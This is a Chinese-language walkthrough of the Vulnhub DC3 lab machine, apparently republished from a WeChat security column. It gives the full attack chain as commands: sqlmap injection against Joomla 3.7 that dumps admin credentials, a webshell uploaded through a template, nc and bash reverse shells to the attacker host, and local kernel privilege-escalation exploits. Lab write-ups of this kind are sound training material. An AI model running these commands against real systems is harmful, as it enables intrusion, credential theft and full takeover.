前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >靶场攻略 | DC3 (Vulnhub)

靶场攻略 | DC3 (Vulnhub)

作者头像
安全小王子
发布2021-05-11 12:10:36
9180
发布2021-05-11 12:10:36
举报
文章被收录于专栏:betasec

基本信息

Kali:192.168.61.145

DC3:192.168.61.163


实验过程

同样先通过arpscan扫描找出DC3的IP地址

代码语言:javascript
复制
sudo arp‐scan ‐‐interface eth0 192.168.61.1/24

这里可以直接看出DC3的IP地址为192.168.61.163

然后我们使用nmap对目标进行扫描

发现目标主机只是打开了80端口

然后我们查看下80端口,通过wappalyzer,发现用的是Joomla

同时主页也给我们提示,表明这个靶机只有一个flag

这里我们使用joomscan专用扫描器,来获取网页更详细的信息

joomscan:https://github.com/OWASP/joomscan

代码语言:javascript
复制
perl joomscan.pl ‐u http://192.168.61.163

可以看到joomla的详细版本号和管理后台

我们通过searchsploit查看是否有可以用的EXP

代码语言:javascript
复制
searchsploit joomla 3.7

可以看到有一个SQL注入漏洞

代码语言:javascript
复制
searchsploit ‐x php/webapps/42033.txt
代码语言:javascript
复制
sqlmap ‐u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐‐dbs ‐p list[fullordering]

接下来就是导出admin的账号密码,就只放个最后的结果图,攻击过程的语句如下

代码语言:javascript
复制
sqlmap ‐u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomaladb ‐‐tables
sqlmap ‐u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐‐columns
sqlmap ‐u "http://192.168.61.163/index.php?
option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐
level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐C
"username,password" ‐‐dump

我们将password的HASH值用john进行破解

解密后的结果为:snoopy

我们尝试进行登陆,发现是正确的账号密码

代码语言:javascript
复制
账号:admin
密码:snoopy

进入后台后,就要想办法上传一句话木马。百度到可以编辑模板来上传一个webshell

这里编辑Beez3模板

这里我在html目录下创建了一个名为dfz.php的webshell

然后我们访问下这个webshell,没有出现404说明成功上传

代码语言:javascript
复制
http://192.168.61.163/templates/beez3/html/dfz.php

接下来用蚁剑来链接

我们在Kali上使用nc,通过蚁剑反弹一个shell

我们现在Kali上建立监听

发现DC3上有python环境,尝试使用python来弹shell,但是Kali上没有任何反应

然后尝试使用bash来弹shell,但是也是不行

尝试使用nc反弹成功

代码语言:javascript
复制
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222 >/tmp/f

然后使用python改善shell环境

代码语言:javascript
复制
python ‐c "import pty;pty.spawn('/bin/bash')"

获取下Linux版本,可以看到是Ubuntu 16.04

我们查找下有没有可以利用的提权EXP,通过searchsploit有好几个

这里我们使用下面的EXP尝试提权

代码语言:javascript
复制
Linux Kernel 4.4.x (Ubuntu 16.04) ‐ 'double‐fdput()' bpf(BPF_PROG_LOAD) Privilege
Escalation                                               | linux/local/39772.txt

我们打开这个EXP的介绍,并到指定网站下载

代码语言:javascript
复制
https://github.com/offensive‐security/exploitdb‐bin‐sploits/blob/master/bin‐
sploits/39772.zip

通过蚁剑上传到靶机

然后接下来的话就是解压、编译、执行EXP来获得root权限,所有命令如下

代码语言:javascript
复制
unzip 39772.zip
cd 39772
tar ‐xvf exploit.tar
代码语言:javascript
复制
./compile.sh
代码语言:javascript
复制
./doubleput

获得flag

额外补充


利用php反弹shell

代码语言:javascript
复制
system("bash ‐c 'bash ‐i >& /dev/tcp/192.168.61.145/2222 0>&1'");
代码语言:javascript
复制
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222
>/tmp/f');

使用Linux-Exploit-suggestion来辅助提权

下载地址:https://github.com/mzet-/linux-exploit-suggester

上传到/tmp中,并加权执行

代码语言:javascript
复制
chmod +x linux‐exploit‐suggester.sh

这里尝试下CVE-2016-5195

EXP地址:https://github.com/gbonacini/CVE-2016-5195

下载完成后通过蚁剑上传,并解压

然后进入目录后make下就可以得到dcow文件,执行./dcow -s 尝试提权

然后靶机就死机了,说明这个EXP不适合

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-05-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 betasec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档